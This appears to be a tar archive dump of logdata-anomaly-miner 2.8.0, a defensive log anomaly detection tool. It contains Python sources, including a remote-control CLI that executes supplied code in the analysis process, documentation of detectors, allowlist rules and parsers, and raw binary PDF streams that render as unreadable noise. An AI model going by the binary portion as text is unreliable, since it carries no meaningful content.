TimeTriggeredComponentInterface.py000066400000000000000000000050721500476301700367160ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util"""This is the interface-class for the TimeTriggeredComponent. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc class TimeTriggeredComponentInterface(metaclass=abc.ABCMeta): """This is the common interface of all components that can be registered to receive timer interrupts. There might be different timelines for triggering, real time and normalized log data time scale for forensic analysis. For forensic analyis different timers might be available to register a component. Therefore the component should state, which type of triggering it would require. """ @property @abc.abstractmethod def time_trigger_class(self): raise NotImplementedError def get_time_trigger_class(self): """Get the trigger class this component can be registered for. See AnalysisContext class for different trigger classes available. """ if self.time_trigger_class not in (1, 2): raise NotImplementedError("The self.time_trigger_class property must be set to AnalysisContext.TIME_TRIGGER_CLASS_REALTIME or " "AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME.") return self.time_trigger_class @abc.abstractmethod def do_timer(self, trigger_time): """Perform trigger actions and to determine the time for next invocation. The caller may decide to invoke this method earlier than requested during the previous call. Classes implementing this method have to handle such cases. Each class should try to limit the time spent in this method as it might delay trigger signals to other. components. For extensive computational work or IO, a separate thread should be used. @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from real time timers or the forensic log timescale time value. @return the number of seconds when next invocation of this trigger is required. """ logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminerremotecontrol.py000077500000000000000000000120431500476301700323750ustar00rootroot00000000000000#!/usr/bin/python3 -BbbW all # -*- coding: utf-8 -*- """This tool allows to connect to a remote control socket, send requests and retrieve the responses. To allow remote use of this tool, e.g. via SSH forwarding, the remote control address can be set on the command line, no configuration is read. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import os import socket import traceback import sys import argparse # Get rid of the default sys path immediately. Otherwise, Python also attempts to load the following imports from e.g. directory # where this binary resides. sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] venv_path = "/usr/lib/logdata-anomaly-miner/.venv/lib" if os.path.exists(venv_path): python_version = os.listdir(venv_path)[0] sys.path += [os.path.join(venv_path, python_version, "site-packages")] from aminer.AnalysisChild import AnalysisChildRemoteControlHandler # noqa: E402 from aminer.util.StringUtil import colflame, flame, supports_color # noqa: E402 from metadata import __version_string__ # noqa: E402 help_message = 'aminerremotecontrol\n' if supports_color(): help_message += colflame else: help_message += flame help_message += 'For further information read the man pages running "man aminerRemoteControl".' parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-c', '--control-socket', default='/var/run/aminer-remote.socket', type=str, help='when given, use nonstandard control socket') parser.add_argument('-d', '--data', help='provide this json serialized data within execution environment as "remote_control_data" (see man ' 'page).') parser.add_argument('-e', '--exec', action='append', type=str, help='add command to the execution list, can be used more than once.') parser.add_argument('-f', '--exec-file', type=str, help='add commands from file to the execution list in same way as if content would have ' 'been used with "--exec"') parser.add_argument('-s', '--string-response', action='store_true', help='if set, print the response just as string instead of passing it to repr') args = parser.parse_args() remote_control_socket_name = args.control_socket if args.data is not None: args.data = json.loads(args.data) remote_control_data = args.data command_list = args.exec if command_list is None: command_list = [] if args.exec_file is not None: if not os.path.exists(args.exec_file): print(f"File {args.exec_file} does not exist") sys.exit(1) with open(args.exec_file, 'rb') as exec_file: command_list += exec_file.readlines() string_response_flag = args.string_response if not command_list: print('No commands given, use --exec [cmd]') sys.exit(1) remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) try: remote_control_socket.connect(remote_control_socket_name) except socket.error as connectException: print(f"Failed to connect to socket {remote_control_socket_name}, aminer might not be running or remote control is disabled in " f"configuration: {str(connectException)}") sys.exit(1) remote_control_socket.setblocking(True) control_handler = AnalysisChildRemoteControlHandler(remote_control_socket) for remote_control_code in command_list: control_handler.put_execute_request(remote_control_code, remote_control_data) # Send data until we are ready for receiving. while not control_handler.may_receive(): control_handler.do_send() while not control_handler.may_get(): control_handler.do_receive() request_data = control_handler.do_get() request_type = request_data[4:8] if request_type == b'RRRR': try: remote_data = json.loads(request_data[8:]) if remote_data[0] is not None: print(f"Remote execution exception:\n{remote_data[0]}") if string_response_flag: print(f"Remote execution response: {str(remote_data[1])}") else: print(f"Remote execution response: {repr(remote_data[1])}") except Exception: print(f"Failed to process response {repr(request_data)}") traceback.print_exc() else: raise Exception(f"Invalid request type {repr(request_type)}") remote_control_socket.close() logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/metadata.py000066400000000000000000000016731500476301700300710ustar00rootroot00000000000000__authors__ = ["Markus Wurzenberger", "Max Landauer", "Wolfgang Hotwagner", "Ernst Leierzopf", "Roman Fiedler", "Georg Hoeld", "Florian Skopik"] __contact__ = "aecid@ait.ac.at" __copyright__ = "Copyright 2023, AIT Austrian Institute of Technology GmbH" __date__ = "2023/01/20" __deprecated__ = False __email__ = "aecid@ait.ac.at" __website__ = "https://aecid.ait.ac.at" __license__ = "GPLv3" __maintainer__ = "Markus Wurzenberger" __status__ = "Production" __version__ = "2.8.0" _indentation = int(max(0, max(0, (29 - len(__version__)))) / 2) __version_string__ = """ (Austrian Institute of Technology)\n (%s)\n%sVersion: %s""" % ( __website__, " " * _indentation, __version__ + " " * _indentation) __all__ = ['__authors__', '__contact__', '__copyright__', '__date__', '__deprecated__', '__email__', '__website__', '__license__', '__maintainer__', '__status__', '__version__', '__version_string__'] del _indentation logdata-anomaly-miner-2.8.0/source/root/usr/share/000077500000000000000000000000001500476301700221035ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/000077500000000000000000000000001500476301700226505ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/000077500000000000000000000000001500476301700270315ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/000077500000000000000000000000001500476301700303045ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Analysis.txt000066400000000000000000000242541500476301700326370ustar00rootroot00000000000000Preamble: ========= This document lists all analysis components, that are components that emit events to the reporting infrastructure on certain conditions. The components in the following list are annotated with short codes describing their properties to speed up search for suitable analysis component. Property codes: * (A)utoconfiguration: This component may learn from the input data and adapt itself to new inputs. * (F)iltering: This component just filters input and distributes it to other analysis components. * (H)ardwired: This component generates events by hard rules. This is the opposite to "statistical triggering". * (N)ondeterministic: This component may react differently to the same input in two runs. * (R)eporting: This component will generate analysis reports for evaluation by an analyst. Those components can be very useful in the configuration phase to understand the processed data better. * (S)tatistical triggering: This component uses statistical methods to trigger on unexpected data. Such components may miss relevant events or cause false-positives. List of components: * EnhancedNewMatchPathValueComboDetector (AH): Same as NewMatchPathValueComboDetector but also supporting value transformation and storage of extra data. * HistogramAnalysis.HistogramAnalysis (R): Create histogram reports for parsed values. * HistogramAnalysis.PathDependentHistogramAnalysis (R): Create path-dependent histogram reports. * MatchValueAverageChangeDetector (AS): Detect when average value of given parsed value changes over time. * AtomFilters.MatchValueFilter (F): Use value of parsed element to forward input data to other analyzers. * MatchValueStreamWriter (F): Forward selected input data e.g. as CSV list, to other compoments via stream, e.g. to perform analysis in another tool. * MissingMatchPathValueDetector (AH): Detect when values for a given path are not received for a longer timespan, e.g. a host, service or address stopped sending/reporting. * MissingMatchPathListValueDetector (AH): Like MissingMatchPathValueDetector but looking on more than one match path for key extraction. * NewMatchPathDetector (AH): Generate events when new parser pathes are found. * NewMatchPathValueComboDetector (AH): Same as NewMatchPathValueDetector but considers combination of values for list of data pathes, e.g. source IP, destination IP, destination port for link analysis. * NewMatchPathValueDetector (AH): Generate events when new parsed values are observed for a given path, e.g. new MAC addresses, user names, ... * TimeCorrelationDetector (ANR): Try to detect time correlations and report them. * TimeCorrelationViolationDetector.TimeCorrelationViolationDetector (H): Detect changes in time correlation on a given ruleset. * TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust (F): Adjust decreasing timestamp of new records to the maximum observed so far to ensure monotony for other analysis components. * TimestampsUnsortedDetector.TimestampsUnsortedDetector (HR): This detector is useful to to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. * AllowlistViolationDetector (FH): Check all inputs using ruleset and create events, forward input to other components. HistogramAnalysis.HistogramAnalysis: ==================================== This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on per-hour basis and sending a report every week: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo histogram_analysis=HistogramAnalysis.HistogramAnalysis( aminer_config, [('/model/line/time', modulo_time_bin_definition)], 3600*24*7, # Reporting interval (weekly) report_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atom_filter.add_handler(histogram_analysis) HistogramAnalysis.PathDependentHistogramAnalysis: ================================================= This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match pathes. Assume there two pathes that include the input property but they separate after the property was found on the path. This might be for example the client IP address in ssh log atoms, where the parsing path may split depending if this was a log atom for a successful login, logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjunct part of the subpathes found. The component uses the same binning functions as the standard HistogramAnalysis.HistogramAnalysis, see documentation there. * Example: # Perform path-dependent histogram analysis: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo path_dependent_histogram_analysis=HistogramAnalysis.PathDependentHistogramAnalysis( aminer_config, '/model/line/time', # The value properties to check modulo_time_bin_definition, 3600*24*7, # Reporting interval (weekly) report_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atom_filter.add_handler(path_dependent_histogram_analysis) AllowlistViolationDetector: =========================== This detector manages a list of allowlist rules to filter parsed atoms. All atoms not hit by any allowlist rule will cause events to be generated. When an atom is matched by a rule, it will be regarded as allowlisted by default but there is also an option to call user-defined functions on a matching rule via MatchAction elements, e.g. to forward the atom to another analyzer in one pass. Predefined actions are: * EventGenerationMatchAction: Generate events, when a rule matches, e.g. to report interesting matches, violations or for debugging. * AtomFilterMatchAction: Filter out the parsed atoms on match and forward it to other handlers, e.g. analysis components. * Rules: The ruleset of this detector is created from classes defined in aminer.analysis.Rules. See below for short list of supported rules or source for full documentation: * AndMatchRule: match only if all subrules match * DebugMatchRule: print debugging text when matching * DebugHistoryMatchRule: keep history of matched LogAtoms * IPv4InRFC1918MatchRule: match IPs in private networks * ModuloTimeMatchRule: match cyclic time values, e.g. nighttime * NegationMatchRule: match only if other rule did not * OrMatchRule: match if any subrule matches * ParallelMatchRule: match if any subrule matches but do not stop at first successful match * PathExistsMatchRule: match if parsed data contains given path * StringRegexMatchRule: match if parsed data string matches given regular expression. If applicable, Value[X]MatchRule should be used instead. * ValueDependentDelegatedMatchRule: select match rules according to values from parsed data * ValueDependentModuloTimeMatchRule: like ModuloTimeMatchRule but select limits according to values from parsed data * ValueListMatchRule: match if value is in given lookup list * ValueMatchRule: match if parsed data contains specific value * ValueRangeMatchRule: match if parsed data value is within given range * Example: # Run a allowlisting over the parsed lines. from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector violation_action=Rules.EventGenerationMatchAction('Analysis.GenericViolation', 'Violation detected', anomaly_event_handlers) allowlist_rules=[] # Filter out things so bad, that we do not want to accept the # risk, that a too broad allowlisting rule will accept the data # later on. allowlist_rules.append(Rules.ValueMatchRule('/model/services/cron/msgtype/exec/user', 'hacker', violation_action)) # Ignore Exim queue run start/stop messages allowlist_rules.append(Rules.PathExistsMatchRule('/model/services/exim/msg/queue/pid')) # Add a debugging rule in the middle to see everything not allowlisted # up to this point. allowlist_rules.append(Rules.DebugMatchRule(False)) # Ignore hourly cronjobs, but only when started at expected time # and duration is not too long. allowlist_rules.append(Rules.AndMatchRule([ Rules.ValueMatchRule('/model/services/cron/msgtype/exec/command', '( cd / && run-parts --report /etc/cron.hourly)'), Rules.ModuloTimeMatchRule('/model/syslog/time', 3600, 17*60, 17*60+5)])) atom_filter.add_handler(AllowlistViolationDetector(allowlist_rules, anomaly_event_handlers)) logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Design.txt000066400000000000000000000200101500476301700322470ustar00rootroot00000000000000Preamble: ========= This document describes the requirement, design and implementation of aminer. For using it, the general "README.md" may suit your needs better than this document. Requirements: ============= * IO-Event triggered stream processing of messages to avoid CPU peaks and allow timely generation of alerts. * Sensible alerting model, e.g. sending of aggregated report 10sec after first anomaly, then have gracetime of 5min. When more events occurred, send another report and double grace time. * Have "environment" flags, e.g. maintenance mode to reduce messages under known procedures. Example: rsyslog should only restart during daily cronjobs, but at any time during maintenance. Design: ======= * Configuration layout: The behaviour of aminer is controlled by 3 different configuration data sources: * config.py: This configuration file is used by the privileged parent process for startup and launching of child process. To avoid parsing and loading larger amounts of configuration into a privileged process, this configuration may contain only the minimal set of parameters required by the parent process. * analysis.py: This (optional) configuration file contains the whole analysis child configuration (code). When missing those configuration parameters are also taken from the main config. * /var/lib/aminer: This directory is used for persistence of runtime data, e.g. learned patterns, statistical data, between different aminer invocations. * Loading of python code: aminer does not use the default dist/site-packages to load code. The rationale behind that is: * Avoid unused code to be loadable or even loaded by default: that code may only increase the attack surface or the memory footprint. * Reduce risk of side effects of unrelated updates: even when not good practices, some pyhton modules try to detect existence of other modules to adapt behaviour when available. This may cause unintended runtime changes when installing or updating completely unrelated python software. * Log file reading: Those problems have to be addressed when processing a continous stream of logging data from multiple sources: * High performance log reading conflicts with proper EOF detection: The select() call is useful to react to available data from sockets and pipes but will always include any descriptors for plain files, as they are always readable, even when at EOF. To detect availability of more data, inotify would have to be used. But while waiting, no socket change can be detected. Apart from that, unprivileged child may not access the directories containing the opened log file descriptors. * Log files may roll over: the service writing it or a helper program will move the file aside and switch to a newly created file. * Multiple file synchronization: When processing messages from two different log data sources to correlate them, care must be taken not to read newest messages only from one source and fall behind on the other source. Otherwise messages generated with quite different time stamps might be processed nearly at the same time while messages originating nearly at same timepoint might be separated. Solutions: * High performance log reading: No perfect solution possible. Therefore workaround similar to "tail -f" was choosen: Use select() on master/child communication socket also for sleeping between file descriptor read attempts. After timeout, handle the master/child communication (if any), then read each file until all of them did not supply any more data. Go to sleep again. * Roll over: Privileged process monitors if the file currently read has moved. When a move is detected, notify the child about the new file. This detection has to occur quite timely as otherwise the child process not knowing about the new file will continue processing and miss relevant correlated patterns due to reading only some of the currently relevant streams. FIXME: readlink best method? Inotify? * Roll over in child: The challenge is to completely read the old file before switching to the new one. Therefore the child relies on the notifications from the parent process to know about new files. When a new file is received, the old one is fstat'ed to known the maximum size of the file, then the remaining data is read before closing the old file descriptor. * Multiple file synchronization: Useful file synchronization requires basic understanding of reported timestamps which implies the need for parsing. Also timestamp correction should be performed before using the timestamp for synchronization, e.g. host clocks might drift away or logging may use wrong timezone. When processing multiple log data streams, all parsed log atoms will be reordered using the timestamp. One stream might not be read at all for some time, when an atom from that stream has timestamp larger than those from other streams. When reaching the end of input on all streams, marks on all reordering queues of unforwarded parsed log atoms are set. Everything before that mark will be forwared anyway after a configurable timespan. This should prevent bogus items from staying within the reordering queue forever due to timestamps far in future. * Input parsing: Fast input disecting is key for performant rule checks later on. Therefore the algorithm should have following properties: * Avoid passing over same data twice (as distinct regular expressions would do), instead allow a tree-like parsing structure, that will follow one parsing path for a given log-atom. * Make parsed parts quickly accessible so that rule checks can just pick out the data they need without searching the tree again. * Rule based distribution of parsed input to detectors: Implementation: =============== * aminer: This is the privileged master process having access to logfiles. It just launches the AminerAnalysisChild and forwards logfiles to it. * AminerAnalysisChild: This process runs without root capablities and just reads logfiles and stores state information in /var/lib/aminer. AminerAnalysisChild processes data in a multistage process. Each transformation step is configurable, components can be registered to receive output from one layer and create input for the next one. * aminer_config.build_analysis_pipeline: This function creates the pipeline for parsing the log data and hands over the list of RawAtom handlers (those who will receive new log-atoms) and a list of components needing timer interrupts. Thus the need for multithreaded operation or asynchronous timer events is eliminated. * TimeCorrelationDetector: This component attempts to perform following steps for each recieved log-atom: * Check which test rules match it. If no rule matched the data, keep it for reference when creating new rules next time. * When a match A was found, go through correlation table to check if any of the other matches has matched recently. If a recent match B had occured, update 2 counters, one assuming that A* (hidden internal event) caused B and then A, the other one that B* cause B and then A. * If maximum number of parallel check rules not reached yet, create a new random rule now using the current log-atom or the last unmatched one. * Perform correlation result accounting until at least some correlation counters reach values high enough. Otherwise discard features after some time or number of log atoms received when they did not reach sufficiently high counts: they may be unique features likely not being observed again. This detection algorithm has some weaknesses: * If match A is followed by multiple machtes of B, that will raise the correlation hypothesis for A*->A->B above the count of A. * For A*->A->B hypothesis, two As detected before the first B will increment count only once, the second pair is deemed non-correlated. logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/ParsingModel.txt000066400000000000000000000037551500476301700334430ustar00rootroot00000000000000Preamble: ========= Sorry, this part of the documentation was not written yet! Check the source code documentation headers from files in directory /usr/lib/logdata-anomaly-miner/aminer/parsing. Here is a short list of the most common model elements with short description: * AnyByteDataModelElement: Match anything till end of a log-atom. * Base64StringModelElement: Parse base64 strings as binary data. * DateTimeModelElement: Simple datetime parsing using python datetime module. See also MultiLocaleDateTimeModelElement * DebugModelElement: Output debugging information while parsing a log-atom * DecimalFloatValueModelElement: parsing of float values * DecimalIntegerValueModelElement: parsing of interger values * DelimitedDataModelElement: Same as AnyByteDataModelElement but include data only up to given delimiter string. * ElementValueBranchModelElement: conditional branching due to previously parsed values. * FirstMatchModelElement: Branch the model taking the first branch matching the remaining log-atom data. * FixedDataModelElement: Match a fixed (constant) string. * FixedWordlistDataModelElement: Match one of the fixed strings from a list. * HexStringModelElement: Match a hexadecimal string. * IpAddressDataModelElement: Match an IPv4 address. * JsonModelElement: Parse JSON data and compare it with an expected key-dictionary. * JsonStringModelElement: Compare JSON string keys with an expected key-dictionary. * MultiLocaleDateTimeModelElement: Parse datetime elements with leap year correction, multiple locale support. * OptionalMatchModelElement: Match subelements zero or one time. * RepeatedElementDataModelElement: Match subelements a given number of times. * SequenceModelElement: Match all the subelements exactly in the given order. * VariableByteDataModelElement: Match variable length data encoded within a given alphabet. * WhiteSpaceLimitedDataModelElement: Match string till next whitespace. * XmlModelElement: Parse XML data with an expected key-dictionary structure. logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrol/000077500000000000000000000000001500476301700331215ustar00rootroot00000000000000Readme.txt000066400000000000000000000006671500476301700350110ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrolThis document contains step by step instructions on what needs to be done to fully support a new Detector in the aminerRemoteControl. - add the Detector class to the exec_locals in the AnalysisChildRemoteControlHandler class. The format needs to be 'NewDetector':aminer.analysis.NewDetector. - if the class supports allowlisting events add it to the checks of the AminerRemoteControlExecutionMethods.allowlist_event_in_component method. logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams/000077500000000000000000000000001500476301700306205ustar00rootroot00000000000000activity_diagram.drawio000066400000000000000000001345301500476301700352760ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams activity_diagram.pdf000066400000000000000000001623101500476301700345570ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams%PDF-1.7 % 7 0 obj << /Filter /FlateDecode /Length 6775 >> stream x=َ$9nhFD  0S{?/;j]AJqTF*2*+;k\R!HȀT8}X @)yx|>`ϑsHb %#_n ⯘s?voi˴h>hd@B3RYt5f̿ CQ|l%gϪleR%O-e IÏCdK ?BJ $χoc~CpN:|~0RJEPb*HBFe$PC-*֢\ > AJx" `> =J)c949  mЏ4x5=> v1#$`P" Ԙ@CRE%jMԨ1NYe#;EMlt7CiܢYŃ-*1EΛM#}U|;.O^ ‹e_IM}L\ITEX|Ս00  >Ƨ}6{C : s<<A8(O<J++D^SVrz.`uZ[xVtV}Fs 3 +I:JPK 3 DQm4O9ayذ<)]Ñ25&wܪp `Q,Z&`۶] 吢I|e_,n7 tJJ"̀O"B"!߿tM^aֽW8oru :+bbGm&aLC@AD;@S Qa=Pm2VۣQr^[ݚGq*ܽ 8woi-W{8 YidO''%D*8ҸΘOMTK oZ 7~_JUǟ:>HK׊+~A0F46Bb772hXa@`>zیDeeGۖ0 %h6:h:{JAJD.`K(]{+AL?,BxbUyֵv0@41N5tKڠfP_`Ջ`9c3rM]BxpAs< j " TJgj ~H]s/.M""?{Gn!ӾNjmqBJl[|z& Ҏym.:텕Oi_Ǎx,Wx<\+͈GSnFnτ=qANInBy/j~ ~{z%f +y¹;qRc8+][FY5)ĵ3NgQIw&AnL˞ u?k\rmU$#(4Tr+zWX H3e? (9kܺOjj2H&[qzh`3nm_s#D8 KZuf[nk\9+<# nK-$f(2tviՁIb:7_Ko`R_5߼`KztY$҂h^w]JZR=5ɬsQp yœ,i?dʂqS&mfiսlfk{1`Rr!!/k1.޷(tI ak>ccrls,z8)i8M 0\\XV5sioq7˭;m.oѧh(XY,r,r~_KKGD.O7n79WnGnGn9>$^'p®L \3׾4JwUnޭ"Ϝ欭gd>mA6BTasn W( ڀ_a>5o-˶P%Gzyҽ#zwLєGJP5R4wcBM-W--&Tu3Oyb.<1jhi5O\5Oiu8'¥b'l,cJ䕍 .ж4ZuA|[O2غTnU2q,y!q{NDIJ|ٯB|{$vko&"[ D4 p\%`2AJ,n9&Cor+ rV]-):L7-V1y;^ 3Fxr0@<<//mK¼\K@4|{$-ӳU8Kv>S. |EYv/bEw#dLV'VtuW1>$~!gN𴰍 b^J{sZ`Ⱥj̸ҹ [Ts}x]+,iHCyțKj&2yiz"S_vplljaAJЇyb69s+`8bZV&#.*e/~5__qeWά~|mZb9X¨@α,">`'ΏrY?o|53Y Z7+nbDzZgD4U1<1U[!ͯ0-,qa,Z$xSi"a_q .{AwGcɆ[w!d20R^4`nS[#j\ta% UXK>4rH%RB!s4KY0D_IA}92k\F!*ժ ˯Mbc`HWIaS)zexl$!Zei?-!BX8FlV]Fq}c\(xJjbǢK=«_[Nuۂ"?O=m'UaixzY5)V*X]].kѴ~O|kŧʭƃ$h׷kƦX?X%-Y9|zLB};:zL?9 ɱL*F?j+aw0JW13 tG?O{' F?U11U[ͯM6R8[ƙ;IC.5~OVzEғbtC#iVa9朵+쏯V,GF$U *,Mf7MU̶hc2M$n擙%+k')R$iҜefaZ9b#v݋E]oO%`kC, ƅ*=+w !tNibMJf s7}yw¤q:)GӾnˍ|JlhqkB3U1.}Nb52&`98QR%CMEbF9^n9r%F10V)Jv:Uqhkw7JU&V2"NȋNZɰՕ 6G ;#hQ{Q>ey6F4ndS'ąhb;qc_*٥d(P=D[.z2ܤ'N%{Nd΂[suuOHs}2޳\TW-_h}ؤ>vz ҉)'e׋Î ^4Y·K#Q["#Ċ*L5i!%_fEc"vW(u>mRR\|iKY5Z(膕FMӢ%{dqӽ? Pru.ޝO1֘ԓ9ènClAzwXWg<6Rȶ|EhƶC^Vبlo~m5}C +vҳmѼCgM=ҵչwMVvh}+ƧPXJ"淼梻 R=Y Uc\Xs W55&Jp-Ӷ) Q jK_H"-] }Y4gqUkƅwpJ*iYޠ6^.l~B}l ޸I~}Ǿw/kS endstream endobj 200 0 obj << /Length1 40008 /Filter /FlateDecode /Length 19466 >> stream xx\Ź͜sV]UbڕUj[͖eKֱ-u14"l;\I0HkΜB.sΜ93|3MYp0emt m7m@ y;bEcmؼ5!GA:O`۳~Ujǃ+0nPdz4ޯ> sx{M:4o|@招枟>auUݵضudg$T|ێu2%"@;- d̀F w@-y ` t} Ew$a%B m+s&h9T˜L\1'<| WIa[a PP%avVv|NFX ;`#t: gJF ;`=; a N\`DyD(# Io\A = al];c6Hy`6#喾Eu uU@Rm0 4 ls-%)6.u0lJ$!"I1wPéelK*Ho;`H*/nN.$7v°-Igo$RuRuJroA +H#RַsFX90!#P `SZ2#pA'X p3ww ߅f0p@v]ɉ4z a'iI{߻S'-S tR\#idh2yG;YN PY>M΁U0kAe 1 [$ ðԏ (P[嶴vypl5ug%. |߻%p·}.p1\"1R .p\ WSU3l/5ES5Kenp _[N5 ng_vp!ICIzI7 srL{FZlrIχ %ir$!/Th=T&ϖ"wT/-s$uE龟o[*Io­2]so { ߆n1>wn!2Ra 0Ϟ?>0<cSԌ<))/8!< ?{ MufXvy[mmOWnl}~rJ?ývr?zۻIFWμ}g=ߩO9۝3}y}???_J5>w~ 7ƝQq!@twؾmͱs7mް~vUXtI{[kKsƆEH*+e ZFNQ #k4@\ 45w`Px ąA!xj0 N O !3!Eĸ0^Ѿ8 #s^'RN >R[qEPh+EquWQ'EB/ y]A)(q.XDq$j]?ɒOΓ2IW找SFC  dDrΞOLd!8 jHu6G\P+85I^=B u.%e#귵+ڱWmYKOqku>V{q6=|c*ƐDuWŗဟ3?oL@]~j 4EhL$FG5 Fh'ewnEycЕcQteއ-•ݽẁE}cʎއ䋉/$8HJX#=8 =UH{(@0?C L,E!EQ0P'QZC ;@Cgˡ50'FCzpTjڨo qeT"8l@F;:%:0RC-"~fH9 т^3[ `D>黯o<ÁV24"ѿ}ã}W8(PqCXeE?B#_EՁEqBytGk`/mkIRH$ݽ|}** k}B\l+g .$^WlkfqmpU\+W8AO7h? nګ%MqU %R u+h-q>d Im+C*84 P˃G}uuG)uqmA\M$\_@ePG3/ĵAK\kCsD)Gkq}% ^IAKH@g8$*qcy0~`-낁JYC:A &%7\;;? яBsy}xT^ J88DF8Mh Cee / K$m 4q$A1u aԗ}j 4'G- .Z :g3W WH_oc} FQ _R3W6 Uy( 5CBZ/56uhP)I8q'~`0' q/Gd(XF˳ld >Ww >?'yT|ѸnB\Bp`p1 zQ!uqd k(1qe:jF{~ "4| Iz!4W߂<P$i Wg}[4FJUCgo| "'B]NRxԹSy< ģ~-qw\=Rf*FJi hơU8TP@ ,Ŀt)V}zK8"+pzy6͹JT~: ?'-r~,iFwœ na[!C8ݐg@߿ϯB/_߻PrJ A4/$\7 pv>>/hucZ ? gd|**ϡBƗ=E?S?$T'?1~+Ѝ_ns_%_z@OA=~ DO )P @p'~ #ZjRF.abF0r#^F.dF0r>#9]ddlcd+#[HsFFzF1"22ZF`d #gd#0>FzYrFzfNF:YRF0H#0H#idzFYH-#QF"0jF02*F*`y1RH #Ō1RH#1f$Fb$HLFd0gD`g$4FR1ˆ#nF\8q0bgƈ #fFL10gDLj #jFT(Q01ALP)F&9G|?37F_y3#22ȟy##o1F~y2ߌy_3 #b䗌32#/1"#?c䧌1#3#?b䇌<>#04#c#S|<OmRBlpxj(l0La|.) PXCa5O](Ca%> VPXNB7. :(, (Rh5 Li'b V>}m|S>"4^ iU*)TP(0&VFRBBMBO!BB. h! Af& @)QH࣐2O`/xR>\IA=lz()3=-}.X9XA%)LIA$u}Bc '鳏C {۸OR_(O=. ޡ6#(iQכ[o oPx> ר~M A~I]q >^w/% /RϟQ)Px1s~DA~@ OS|K8''(.p񸳇OΆwѸ|FK]Hq8SM< (0BAom94ĶА)(Ka40 4giuDrZ (lshWҤz)]N_CSEBǸ#:;;z/w\:i2nDa1lwn +_W780_-(q[t[H]־q+Q* b;ǭ+n??_O?߫GG[K>S~?Ms{[[{/࿦߬ߤUQ~?~?~?eu%ukt濠 q@Ň\Գg}=}HϷu߅{e_ԦCs=_9Ю.ǮBv]h°˲Kv9v,q`G|bA|;0@DDxtq{֞mlYg7Vn>g}س3TgrgMeC=*WsheO_eo ./9Uygi咞%\oli;R|gqecOWC%UH,$KR}C|Q| }}͜§-ދz95?vgu4\(ab<+j4;;qß pH@ $Ǐ '=ȟtRBAw5ָf9qtex7<.Nx;xx+x x38">D DD< ""^"^"AC Ax x5D D|x%D "^"^"w@ĝ 2Rq; D "n7@ċAč q=DD\ "# Bq5xx> D\ "灈@ĥ q1D\".烈@aq.8D "@Aq&8"A@ĩ b8D{@n D;@v Dl[@f Dl@zDk@j D+jӵM>}4]"J@D O@DN>}"ADD @D " DmADo"=w 7AD7  ߀^ 